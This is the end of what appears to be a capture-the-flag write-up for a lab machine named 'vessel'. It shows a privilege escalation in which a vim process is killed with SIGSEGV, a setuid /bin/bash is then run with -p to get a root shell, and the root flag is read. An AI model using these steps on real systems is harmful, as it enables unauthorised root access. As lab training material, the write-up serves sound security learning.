ethan 28596 0.0 0.0 6300 656 pts/1 S+ 12:17 0:00 | \_ grep --color=auto test
ethan 28592 0.0 0.2 21860 9628 pts/2 S+ 12:16 0:00 \_ vim test

Kill it with a signal that produces a core dump:

ethan@vessel:~$ kill -SIGSEGV 28592

Check the setuid bit on bash; root obtained:

ethan@vessel:~$ ls -alht /bin/bash
-rwsr-sr-x 1 root root 1.2M Apr 18 2022 /bin/bash
ethan@vessel:~$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0# cat /root/*
707fa02b95dcec879064b3fc6e2ad198

The only two places where it is easy to get stuck: the mysqljs entry point, which is easy to miss if you are not careful, and realising, when generating the wordlist, that the password was originally produced on Windows.